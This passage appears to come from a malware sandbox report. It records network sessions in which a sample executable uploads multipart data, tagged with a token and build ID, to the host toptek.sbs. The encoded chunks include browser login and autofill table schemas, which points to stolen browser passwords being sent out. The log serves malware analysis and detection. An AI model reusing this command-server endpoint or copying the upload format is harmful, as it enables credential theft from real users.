                                                                                                                                                                                                                                                                                    2024-12-23 05:57:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:43 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    14192.168.2.54975694.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:43 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----R1D2DTRQIEU37YU3OPPZ
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 55081
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:43 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 52 31 44 32 44 54 52 51 49 45 55 33 37 59 55 33 4f 50 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 52 31 44 32 44 54 52 51 49 45 55 33 37 59 55 33 4f 50 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 52 31 44 32 44 54 52 51 49 45 55 33 37 59 55 33 4f 50 50 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------R1D2DTRQIEU37YU3OPPZContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------R1D2DTRQIEU37YU3OPPZContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------R1D2DTRQIEU37YU3OPPZCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:43 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:43 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:45 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:45 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    15192.168.2.54976294.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:45 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----9ZUS2DTRQIE3EUS26P8G
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 142457
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:45 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 39 5a 55 53 32 44 54 52 51 49 45 33 45 55 53 32 36 50 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 55 53 32 44 54 52 51 49 45 33 45 55 53 32 36 50 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 55 53 32 44 54 52 51 49 45 33 45 55 53 32 36 50 38 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------9ZUS2DTRQIE3EUS26P8GContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------9ZUS2DTRQIE3EUS26P8GContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------9ZUS2DTRQIE3EUS26P8GCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:45 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                                    Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
